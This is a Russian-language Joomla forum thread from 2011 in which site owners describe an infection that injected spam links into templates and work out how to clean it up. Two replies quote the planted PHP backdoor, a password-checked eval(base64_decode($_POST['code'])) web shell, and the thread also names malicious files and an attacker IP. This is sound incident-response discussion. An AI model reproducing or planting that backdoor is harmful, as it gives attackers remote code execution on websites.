Основной курс по Joomla

Подозрение на заражение

0 Пользователей и 1 Гость просматривают эту тему.
  • 38 Ответов
  • 8219 Просмотров
*

argon06

  • Осваиваюсь на форуме
  • ***
  • 50
  • 2
Подозрение на заражение
« : 03.03.2011, 18:38:08 »
Случайно в браузере после ног увидел лишний текст, просмотр через гугло бот подтвердили опасения
Код
</div>
</div> <!-- //FOOTER -->
</div>

<!--cacheb--><p><a href="http://profilsup.fr/" title="generique viagra discount">generique viagra discount</a> | </p><!--cachee-->
</body>
</html>

перерыл весь шаблон (ja_purity_ii) и нашел в папке  layouts в файлах    
  • default-joomla.php
  • default.php
  • handheld.php
  • iphone.php
  • left-main-right.round.php
  • left-main-right.square.php
  • left-right-main.round.php
  • left-right-main.square.php
  • main-right-left.round.php
в самом низу нашлась строчка:
Код
<!--cacheb--><?php if (defined('JOOMLA_CACHE')) { echo JOOMLA_CACHE; } ?><!--cachee-->
Знающие люди, подскажите откуда берется эта реклама и как почистить кроме того что бы удалить эту строку из всех файлов!
Буквально месяц назад на сайте был iframe-вирус, излечился и пароли все сменил, а сейчас снова такое!


*

askona

  • Осваиваюсь на форуме
  • ***
  • 98
  • 2
Re: Подозрение на заражение
« Ответ #1 : 09.03.2011, 21:55:50 »
Такая же фигня . Причем код из шаблона удаляешь, меняешь все пароли  иопять он появляется через день. Подскажите как от этого избавиться. FTP пароль сменил, после смены вообще не заходил по FTP а код все равно появился. Помогите пожалуйста.
Если хочешь сделать что-то хорошо, сделай это сам.(Фердинанд Порше)

*

wishlight

  • Профи
  • ********
  • 3593
  • 220
  • skype aqaus.com

*

askona

  • Осваиваюсь на форуме
  • ***
  • 98
  • 2
Re: Подозрение на заражение
« Ответ #3 : 09.03.2011, 23:17:11 »
Скорее всего ломают через какое то уязвимое расширение или залит шелл который вы не убрали.
А как его найти? Помимо этого прописывается в папках tmp cache и images/stories файл thumbs.php
в котором вот такой код:
<?php if(md5($_POST["password"])=="42554769b6d9a25f116f0ca87f66c85a"){eval(base64_decode($_POST["code"]));} ?>   больше пока ничего не нашел. Взлом был 2 марта 2011 года
Если хочешь сделать что-то хорошо, сделай это сам.(Фердинанд Порше)

*

argon06

  • Осваиваюсь на форуме
  • ***
  • 50
  • 2
Re: Подозрение на заражение
« Ответ #4 : 11.03.2011, 17:33:55 »
thumbs.php- удаляй везде где найдешь, потом если старая версия нужно обязательно обновиться до последней (у меня была 1.5.12)
еще посмотри сайт на наличие файлика processor.jpg, особенно в папках от модулей/компонентов и т.д. так же рядом с эти файлом может быть еще с примерным названием link.*.db (точно не помню название), проверяй папки с название tmp вся дрянь как правило там.
И еще построчно посмотри код index.php в твоем шаблоне, у меня где то в середине был include на processor.jpg, так же стоит обратить внимание на footer.php

*

askona

  • Осваиваюсь на форуме
  • ***
  • 98
  • 2
Re: Подозрение на заражение
« Ответ #5 : 12.03.2011, 11:09:54 »
спасибо, посмотрю.
Если хочешь сделать что-то хорошо, сделай это сам.(Фердинанд Порше)

*

argon06

  • Осваиваюсь на форуме
  • ***
  • 50
  • 2
Re: Подозрение на заражение
« Ответ #6 : 14.03.2011, 15:32:40 »
ну и еще совет, который дают везде - почаще делать бэкапы

*

pavel55

  • Осваиваюсь на форуме
  • ***
  • 30
  • 2
Re: Подозрение на заражение
« Ответ #7 : 29.03.2011, 19:09:17 »
У меня такая же беда: http://joomlaforum.ru/index.php?topic=157547.new;topicseen#new

Удалил как написано выше все, но все равно на сайте генерируется скрытый текст.  Где этот вирус сидит так и не разобрался.  Может кто подскажет, на что ещё можно обратить внимание?

*

busik

  • Осваиваюсь на форуме
  • ***
  • 175
  • 7
Время модификации файлов смотрели?
« Ответ #8 : 29.03.2011, 19:12:48 »
В принципе у всех оно приблизительно одинаковое, если у каких-то сильно отличается - смотрите их внимательно. У меня несколько раз врезали код вверху, один раз внизу. И еще один раз модифицировали не .php файлы, а index.html, который в Жумле почти в каждой папке

*

argon06

  • Осваиваюсь на форуме
  • ***
  • 50
  • 2
Re: Подозрение на заражение
« Ответ #9 : 30.03.2011, 16:20:25 »
и как правило вся эта дрянь идет из временных папок компонентов и модулей, стоит внимательно проверить их

*

svoloth

  • Новичок
  • *
  • 7
  • 0
Re: Подозрение на заражение
« Ответ #10 : 04.04.2011, 15:09:37 »
удали libraries/joomla/loader.php и заблокируй IP  который найдеш  в loader.php (78.159.101.232).

*

pavel55

  • Осваиваюсь на форуме
  • ***
  • 30
  • 2
Re: Подозрение на заражение
« Ответ #11 : 04.04.2011, 15:36:58 »
удали libraries/joomla/loader.php и заблокируй IP  который найдеш  в loader.php (78.159.101.232).

Спасибо, удалил! Наверное глупый вопрос, но как этот IP заблокировать? У хостера просить?

*

pavel55

  • Осваиваюсь на форуме
  • ***
  • 30
  • 2
Re: Подозрение на заражение
« Ответ #12 : 04.04.2011, 16:05:08 »
Хостер посоветовал так сделать:
Цитировать
Добавьте в файл .htaccess, который находится в корне Вашего сайта:
deny from 78.159.101.232
Этой записью Вы запретите доступ к Вашему сайту с этого IP-адреса.

*

svoloth

  • Новичок
  • *
  • 7
  • 0
Re: Подозрение на заражение
« Ответ #13 : 04.04.2011, 17:21:35 »
Хостер посоветовал правильно  ^-^

*

fatseo

  • Захожу иногда
  • **
  • 11
  • 0
Re: Подозрение на заражение
« Ответ #14 : 04.04.2011, 21:15:32 »
Народ, на всех своих сайтах обнаружил подобный взлом.
Joomla 1.5.22.
Походу это массовая атака, и используется для простановки seo ссылок - что кстати может загнать ваш сайт в бан Яндекса.

Где-то уязвимость через которую залит шелл.
Блокируя IP и удаляя файлы - уязвимость остается всё равно.

Кому-нибудь удалось её найти?

*

Antik_26

  • Осваиваюсь на форуме
  • ***
  • 33
  • 1
Re: Подозрение на заражение
« Ответ #15 : 30.04.2011, 19:39:11 »
Тоже имею данную проблему. Как бороться?

*

busik

  • Осваиваюсь на форуме
  • ***
  • 175
  • 7
Re: Подозрение на заражение
« Ответ #16 : 03.05.2011, 00:01:40 »
Хостер посоветовал правильно  ^-^

Я так с дури в свое время роботов Яндексовских запретил :)

*

voland

  • Профи
  • ********
  • 9383
  • 420
  • Эта строка съедает место на вашем мониторе
Re: Подозрение на заражение
« Ответ #17 : 03.05.2011, 02:35:48 »
У кого есть такая проблема..
И ЕСТЬ логи доступа за период когда она появилась - ссылку на архив с логами в личку, посмотрю.
При отсутсвии логов за нужный период - не писать.

*

svoloth

  • Новичок
  • *
  • 7
  • 0
Re: Подозрение на заражение
« Ответ #18 : 03.05.2011, 12:06:07 »
в логах ничего нет, смотрел HTTP и FTP

*

EDO

  • Новичок
  • *
  • 5
  • 0
Re: Подозрение на заражение
« Ответ #19 : 08.05.2011, 22:18:22 »
Вот и моё время пришло ))))
Всем привет. Нашёл следующее по теме:
http://help.yandex.ru/webmaster/?id=1116584

И кон у себя такой нашёл в файле, которого не должно быть \libraries\joomla\loader.php -  удалил. Всего было два, оставил один.

to argon06: Спаибо, нашёл 4 thumbs.php и удалил с похожим на <?php if(md5($_POST["password"])=="42554769b6d9a25f116f0ca87f66c85a"){eval(base64_decode($_POST["code"]));} ?> кодом.

Ищу дальше. После чистки нужно обновлять. Пока только не совсем понятно, на сайте не нашёл переходного файла с 1.5.12 до последней, попробую 1.5.1_ закинуть.

Далее:
Ктото пытаеться ломать и ломать...
Есть интересный файлик error_log рекомендую глянуть. Там много интересного связанного с файлом \libraries\joomla\loader.php

Спустя несколько часов:
Обновил, почистил и SEF404 выдал следующее, спустя минут 30 после перезаливки
Статус Безопасности: May-2011 [Обновить] (2011-05-09 01:00:58)
Насчитано атак   45    0.2 /h
Слишком много запросов (флуд)   45   100.0 % | 000.2 /h
===
Я так понимаю, что это группа людей с серверами.
В инете всё больше и больше инфы про аналогичные случаи.
Но решения пока нету :) Есть только меры предосторожности...
Видимо ктото хочет добить Joomla.
Глянем логи.. ничего необычного...

Будем следить и дальше...
« Последнее редактирование: 09.05.2011, 03:45:57 от EDO »

*

svoloth

  • Новичок
  • *
  • 7
  • 0
Re: Подозрение на заражение
« Ответ #20 : 09.05.2011, 14:25:38 »
переместил configuration.php  в другое место, ссылки невыводится, но код вставлают

*

EDO

  • Новичок
  • *
  • 5
  • 0
Re: Подозрение на заражение
« Ответ #21 : 09.05.2011, 16:27:31 »
to svoloth: configuration.php с каким доступом? 0444?

Ещё я снёс Authentication - OpenID, Authentication - GMail и Authentication - LDAP.
Они не активны по умолчанию, но возможно это тоже дыры...
Гдето в логах обращение к OpenID проскакивало..

*

svoloth

  • Новичок
  • *
  • 7
  • 0
Re: Подозрение на заражение
« Ответ #22 : 09.05.2011, 21:09:05 »
Цитировать
configuration.php с каким доступом? 0444?
644

*

EDO

  • Новичок
  • *
  • 5
  • 0
Re: Подозрение на заражение
« Ответ #23 : 10.05.2011, 01:20:34 »
644
Я попробовал поставить 0444 на configuration.php, .htaccess, index.php (тот, что в templates).
Это ко всему вышеописанному.

*

EDO

  • Новичок
  • *
  • 5
  • 0
Re: Подозрение на заражение
« Ответ #24 : 04.06.2011, 13:22:29 »
Ну вот... Прошло почти месяц со дня чистки и некоторых (выше-описанных) манипуляций.
Новых атак пока не наблюдается.
Думаю, что дыры всё-таки тут: Authentication - OpenID, Authentication - GMail и Authentication - LDAP.

*

SmokerMan

  • Профи
  • ********
  • 5329
  • 689
Re: Подозрение на заражение
« Ответ #25 : 06.06.2011, 13:39:33 »
Думаю, что дыры всё-таки тут: Authentication - OpenID, Authentication - GMail и Authentication - LDAP.
нету там никаких дыр.

*

voland

  • Профи
  • ********
  • 9383
  • 420
  • Эта строка съедает место на вашем мониторе
Re: Подозрение на заражение
« Ответ #26 : 10.06.2011, 00:28:36 »
Опять попался..
логи пустые, время одно
Остается 2 варианта - кража фтп-доступа (хотя клиент до этого сидит на маке...) либо дыра у хостера.
Очередной клиент на infobox`е но саппорт не дает фтп-логи напрямую (через клиента итп... короче гемор, но отписал)

*

voland

  • Профи
  • ********
  • 9383
  • 420
  • Эта строка съедает место на вашем мониторе
Re: Подозрение на заражение
« Ответ #27 : 10.06.2011, 02:17:00 »
Написал быстренько скриптик удалять всю эту пакость
Если скрипт помог - можете донейтить на ЯД 41001251003183 или R545653827015 или Z267652009871

*

busik

  • Осваиваюсь на форуме
  • ***
  • 175
  • 7
Re: Подозрение на заражение
« Ответ #28 : 11.06.2011, 01:57:03 »
Опять нашел на сайте вирусняк (троян), подсаженыей 28 мая (уж не знаю в какой раз). Задумался о дырах у провайдера ...